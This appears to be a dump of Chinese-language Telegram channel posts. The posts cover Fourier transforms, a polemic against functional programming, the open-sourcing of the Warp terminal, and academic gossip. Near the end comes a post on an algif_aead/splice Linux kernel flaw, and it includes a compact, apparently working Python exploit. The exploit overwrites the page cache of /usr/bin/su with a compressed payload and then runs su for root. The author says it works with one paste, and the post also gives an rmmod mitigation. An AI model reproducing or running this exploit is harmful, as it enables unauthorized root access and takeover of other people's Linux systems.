Forwarded from 春东西 dumb box
https://t.iss.one/hyi0618/12424?comment=158532 #signal
#learn https://chat.librechat.ai/share/XcfJcz50PNkyX4ZJrP86j
心血来潮就可以写…… 感觉比认真写科普文时写得好,AI也这么评价 🤔
#learn https://chat.librechat.ai/share/XcfJcz50PNkyX4ZJrP86j
心血来潮就可以写…… 感觉比认真写科普文时写得好,AI也这么评价 🤔
Telegram
dnaugsuz in yihong0618 Chat
#signal https://www.jezzamon.com/fourier/zh-cn.html
傅里叶是基于一堆圆圈共振做的。 想象一下你在Excel里画圈,A1是男低音🕔,A9是女高音🕑,B1:B9是mp3,往下拉一下,
def DFT(x):
N=len(x);i=arange(N)
k=i.reshape((N,1)) # A1是男低音🕔,折线k和你的mp3一样长
return exp(-2j*pi* k*(i/N)) @x # (i/N)是播放的进度条,-2j🥧是顺时针转…
傅里叶是基于一堆圆圈共振做的。 想象一下你在Excel里画圈,A1是男低音🕔,A9是女高音🕑,B1:B9是mp3,往下拉一下,
def DFT(x):
N=len(x);i=arange(N)
k=i.reshape((N,1)) # A1是男低音🕔,折线k和你的mp3一样长
return exp(-2j*pi* k*(i/N)) @x # (i/N)是播放的进度条,-2j🥧是顺时针转…
🫡1
🤓 ☝🏻
我们入门了频域的这种“非常宽的进度条”,又了解了B站防挡字幕的算法,还有人声消除、降噪(或杜比音效)的AI正交分解
但是,现在的GenAI更有意思。请寻找隐喻,说明RIFE和ESRGAN的升帧率/升采样原理
我们大致过了一遍现在的内容生产力AI,包括正交分解与GenAI
当然,现在的AI为了节省算力也有降智问题,比如N卡的实时超分辨率功能,也被诟病“生搬硬套”到损害游戏画面
我们入门了频域的这种“非常宽的进度条”,又了解了B站防挡字幕的算法,还有人声消除、降噪(或杜比音效)的AI正交分解
但是,现在的GenAI更有意思。请寻找隐喻,说明RIFE和ESRGAN的升帧率/升采样原理
我们大致过了一遍现在的内容生产力AI,包括正交分解与GenAI
当然,现在的AI为了节省算力也有降智问题,比如N卡的实时超分辨率功能,也被诟病“生搬硬套”到损害游戏画面
duangsuse::Echo
#math 如何用一个【没有发生】的东西,证明一个发生了的镜子存在且以read开头?🤓✅ 反正 while "I AM": print(read()) 它可以从print开头,也可以从 not("I AM") 或者说 break; 开头,另一条世界线的宇宙“从一开始就是无,而不是有。” 因为苏格拉底选择用read(从笑和幸福)开头,我所理解的《数学》也要这么开头。广义相对论选择用print开头,是因为有人不明白 alias print=echo…… 可是人工智能实验室的Lisper知道的,哪怕祂“没写过”。🌚👌…
#FP 纯函数其实就一句话:“编程的人不调用「结果不一样的函数」”。
input(">>>") 和 random.pick(*"AB") 结果只在测试环境下一样,print() 在caller不能读取它(stdout流)时结果不一样,yield在耗时上结果不一样。
那么他们是怎么把代数搬到电脑里的呢?不是写vec2场函数,也不是挑战Rust宏或平民版comptime func,是把JS里的.then(f)做成“编译期查表出f”。
没错,去掉副作用只靠「不调用0参函数」(拒绝全局this和“立即树相等”),所以他们把任何函数都塞给了一个argLast:我们一般叫“调用栈”、“单步调试或执行”的那参数,还美其名曰高质量工程。数学和计算机就是扯淡,真数学的门(Torch/Taichi)FPer摸不到
用范畴论术语装点门面。范畴的集合可是有N:1箭头函数的,就连物理模拟也有2:1的sqrt(x)计算,哥德尔不喜欢听废话,什么时间和折叠(eval order)没有发生因为“代数生效了”。
Monad和 #Haskell 的Logo(>>=) 又是什么呢?结合律。
(read | greet) | echo 和 read | (greet | echo) 是等同的
(a;b);c == a;(b;c)
窝槽,这不是废话吗?不对。因为 greet(x) 有1个点位,所以FPer就造了整个“链式调用栈”,来发扬Curry和模式匹配GADT&class延迟绑定的精神,
其实 a;(b;c) 根本就是鬼扯,任何一个正常人都看得出Lambda不是这么用的
套那么多层无非是为了实现 if(Q,print,print) 和 if(Q,return,''), print 的“调用侧决定”,引用一大堆有的没的paper,
最后还不如 yield eventTuple 或纯粹的 DSL=(...lit)=>(env)=>{return value}
写操作系统和编译期函数的人早就知道了,DB/DS/CG 领域的人知道的更「纯函数」。
有这点能力不去写些有意义的DSL和“可以不乱的混乱语法”,去屠C++ template<>的龙,却凑一个死寂了70年的数学界的热闹。现在还想证明Dijkstra的软件测试知识是错的。
CS+Math,学术cosplay。 🎓 👎
我不两次踏入同一条河流,任何一个用户都是如此。 πάντα ῥεῖ
1958: Lisp → 解决实际问题(AI, symbolic)
1972: C → 解决实际问题(Unix, 系统)
1974: SQL → 解决实际问题(数据管理)
1983: C++ → 解决实际问题(性能+抽象)
1991: Python→ 解决实际问题(快速开发)
1995: Java → 解决实际问题(企业应用)
2009: Go → 解决实际问题(并发服务)
2015: Rust → 解决实际问题(安全+性能)
世界在变,数学没有意义,或者说数学的语言没有用。数学依靠语言,不是语言依靠数学。
如果代数逻辑都不够母语,还有什么是“整个宇宙的方言”?所以,没有一种有价值的领域,在担保上败给数学。
脱离涌现的几何知识是死的,死枝「挂名不上」活果实,就像量子物理承认了芝诺、费马、贝克莱大主教(牛顿的“好同事”)、高斯曲率定理。断言什么死的正确,真知识就复活来否定它。
就连算力的语言,也很可能是安排不够好而卡慢的。或许走一遍必然是 O(N),数学无穷里一定有一堆Node可以跑通 A->B,但谁告诉你N一定要有“那么多”?
"If 🍎 + 3 = 5, what is 🍎?" 🍎 = 1.
Accepted.
https://github.com/Kuri-su/yinwang.bak/blob/master/articles/函数式语言的宗教.md#:~:text=这个世界里的所有东西都是“有线”的。你需要绞尽脑汁
幸好我不需要线。没有吃掉苹果的人,才害怕那道线不对。 😊
GitHub
yinwang.bak/articles/函数式语言的宗教.md at master · Kuri-su/yinwang.bak
yinwang.org's auto backup. Contribute to Kuri-su/yinwang.bak development by creating an account on GitHub.
Forwarded from 开源早报
📢 AI终端 Warp 现已开源
❓为什么开源:
Warp 认为“写代码”已不是瓶颈,真正瓶颈是人力驱动的规格、验证与迭代速度,所以现在开源并引入社区协同管理代理,能更快把产品做对、做强。
🆕 核心更新:
🔹 Warp 客户端正式开源,代码仓库公开,采用 AGPL 许可证。
🔹 开发流程改为“社区 + Agent协作”:鼓励用 Oz 编排 Agent 完成编码/测试,人类聚焦方向与验收。
🔹 产品侧同步开放:新增更多开源模型支持(含 Kimi、MiniMax、Qwen),并上线 auto (open) 自动路由模型。
🔹 可定制性增强:支持从“纯终端”到“完整 ADE”多层形态切换。
🔹提供可编程 settings 文件,便于跨设备迁移与自动化配置。
🔑 关键词:
#warp AGPL Oz
🔗 查看详情 |🎲 Github
❓为什么开源:
Warp 认为“写代码”已不是瓶颈,真正瓶颈是人力驱动的规格、验证与迭代速度,所以现在开源并引入社区协同管理代理,能更快把产品做对、做强。
🆕 核心更新:
🔹 Warp 客户端正式开源,代码仓库公开,采用 AGPL 许可证。
🔹 开发流程改为“社区 + Agent协作”:鼓励用 Oz 编排 Agent 完成编码/测试,人类聚焦方向与验收。
🔹 产品侧同步开放:新增更多开源模型支持(含 Kimi、MiniMax、Qwen),并上线 auto (open) 自动路由模型。
🔹 可定制性增强:支持从“纯终端”到“完整 ADE”多层形态切换。
🔹提供可编程 settings 文件,便于跨设备迁移与自动化配置。
🔑 关键词:
#warp AGPL Oz
🔗 查看详情 |
Please open Telegram to view this post
VIEW IN TELEGRAM
Warp
Warp is now open-source
Warp is now open-source, and the community can participate in building it using an agent-first workflow managed by Oz, our cloud agent orchestration platform.
duangsuse::Echo
#math 如何用一个【没有发生】的东西,证明一个发生了的镜子存在且以read开头?🤓✅ 反正 while "I AM": print(read()) 它可以从print开头,也可以从 not("I AM") 或者说 break; 开头,另一条世界线的宇宙“从一开始就是无,而不是有。” 因为苏格拉底选择用read(从笑和幸福)开头,我所理解的《数学》也要这么开头。广义相对论选择用print开头,是因为有人不明白 alias print=echo…… 可是人工智能实验室的Lisper知道的,哪怕祂“没写过”。🌚👌…
#math #cs #ai锐评
这些不是抽象废话,而是我真正理解FFT和「纯函数式编程」的动力。恰恰是不以为真理掌握在少数人手里,才知道最平凡的Excel和REPL,也能理解「最先进的思想之一」
方向不对,越理解越缺乏认知。唯有受众具体了,才能看到(Visionary)。
这些不是抽象废话,而是我真正理解FFT和「纯函数式编程」的动力。恰恰是不以为真理掌握在少数人手里,才知道最平凡的Excel和REPL,也能理解「最先进的思想之一」
方向不对,越理解越缺乏认知。唯有受众具体了,才能看到(Visionary)。
Forwarded from Dante's Limbo (cairn)
据说历史学家杨念群乱搞男女关系被开除党籍,豆瓣上的历史学人还是有点吞吞吐吐,就有点像「你知道吗,那个谁出事了」的。但是说茅海建倒是敢直呼其名,如:https://www.douban.com/topic/485713426 。看来这群历史学人真的学到历史的教训了,没有盖棺论定之前说话都得小心点。我是觉得说人坏话这种喜闻乐见的事情,要么别说,要么别云里雾里。我要是有能力报复,会因为你当年吐槽我的时候遮遮掩掩就手下留情么? #cairn
AI-assisted. The starting insight — that splice() hands page-cache pages into the crypto subsystem and that scatterlist page provenance might be an under-explored bug class
2017 algif_aead in-place optimization
The same 732-byte Python script roots every Linux distribution shipped since 2017.
mainstream Linux distribution — you're in scope. (non-RCE)
No race condition. Dirty Cow needed to win a TOCTOU window
Dirty Pipe abused pipe buffer flags. Copy Fail abuses an AEAD scratch write.
#security #bash algif_aead 允许用户态程序(User Space)通过sock接口调用内核实现的加密算法(比如 AES-GCM,TLS 1.2/LUKS)。
对于大多数常规服务器,禁用该模块不会产生任何业务影响。 😅👎
绝大多数常见的 Web 服务器(如 Nginx、Apache)和编程语言(如 Python、Go、Node.js)使用的是用户态加密库 OpenSSL / BoringSSL,而不是通过内核 Socket 接口。
直接在ipy输入 %cpaste ,亲测直接一键root
内核开发者为了提升性能,在 algif_aead 模块中引入了一个“原地操作 (in-place)”的优化补丁,让解密操作复用同一个内存缓冲区以节省开销。
如果利用内核的 splice() 系统调用,攻击者可以欺骗内核,使其在处理失败的解密操作时,将 4 个字节的攻击者可控数据,写入到系统的文件页缓存 (Page Cache) 中。
攻击者利用 splice 把一个只读的系统文件(比如权限配置文件)伪装成加密数据的缓冲区。当解密失败时,内核本该报错,却因为逻辑混乱,顺手把一些攻击者控制的数据“原地”写入
就像 arr.slice(start, end) 如果参数传得太离谱,JS 会帮你静默处理成空或合法范围。Linux的字节实现里,这意味着你改了内存,就等于改了文件。
攻击者可以控制内核内存的覆盖内容,他们可以破坏关键的内核数据结构(如 cred 结构体)仅用 10 行左右的纯 Python 脚本就能在任何平台上实现稳定提权。
😅😅😅 🐧
ssize到底有什么意义?答:表达NULL,或者说JS的?.和 ?? 运算符,这真是“优雅” #ce
Rust也不是什么好鸟。ssize_t不仅写起来又长又易混,语义上还把bool性和uint性(T? vs T)混为一谈。Rust没有真正意义上将值vs错误作为一等公民,还在拿这个区分工程师的熟练度。类型税(Type Tax)
对于大多数常规服务器,禁用该模块不会产生任何业务影响。 😅👎
ss -a | grep -i alg 若为空,则可以直接 rmmod algif_aead绝大多数常见的 Web 服务器(如 Nginx、Apache)和编程语言(如 Python、Go、Node.js)使用的是用户态加密库 OpenSSL / BoringSSL,而不是通过内核 Socket 接口。
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
直接在ipy输入 %cpaste ,亲测直接一键root
内核开发者为了提升性能,在 algif_aead 模块中引入了一个“原地操作 (in-place)”的优化补丁,让解密操作复用同一个内存缓冲区以节省开销。
如果利用内核的 splice() 系统调用,攻击者可以欺骗内核,使其在处理失败的解密操作时,将 4 个字节的攻击者可控数据,写入到系统的文件页缓存 (Page Cache) 中。
攻击者利用 splice 把一个只读的系统文件(比如权限配置文件)伪装成加密数据的缓冲区。当解密失败时,内核本该报错,却因为逻辑混乱,顺手把一些攻击者控制的数据“原地”写入
就像 arr.slice(start, end) 如果参数传得太离谱,JS 会帮你静默处理成空或合法范围。Linux的字节实现里,这意味着你改了内存,就等于改了文件。
攻击者可以控制内核内存的覆盖内容,他们可以破坏关键的内核数据结构(如 cred 结构体)仅用 10 行左右的纯 Python 脚本就能在任何平台上实现稳定提权。
😅😅😅 🐧
内核在某些路径下,使用了 size_t(无符号)和 ssize_t(有符号)的混合运算,这反映Rust的 i32 vs u32 vs usize 命名设计更合理。size类型名太长就会叫人懒得写
ssize到底有什么意义?答:表达NULL,或者说JS的?.和 ?? 运算符,这真是“优雅” #ce
Rust也不是什么好鸟。ssize_t不仅写起来又长又易混,语义上还把bool性和uint性(T? vs T)混为一谈。Rust没有真正意义上将值vs错误作为一等公民,还在拿这个区分工程师的熟练度。类型税(Type Tax)
duangsuse::Echo
mainstream Linux distribution — you're in scope. (non-RCE)
真神人 Kernel.org ,一个全栈都不用的kmod整出一键root脚本来了
这漏洞都快十年了。2017往后随便点开一个应用都能看/home/*数据,上传你的D:盘,或者偷LUKS密码
喜欢在网上curl|bash的人懵逼了,这内核级还能沙箱逃逸啊
😅🖕
这漏洞都快十年了。2017往后随便点开一个应用都能看/home/*数据,上传你的D:盘,或者偷LUKS密码
喜欢在网上curl|bash的人懵逼了,这内核级还能沙箱逃逸啊
海量代码一直放在那里,只是以前要靠高水平人士人工审查,快不起来。大部分是发现被利用了才去修补。
发掘漏洞的速度同样慢,大家都是原始人。
现在有了AI,全给筛一遍成本只是token,更多的陈年漏洞还会到来。
😅🖕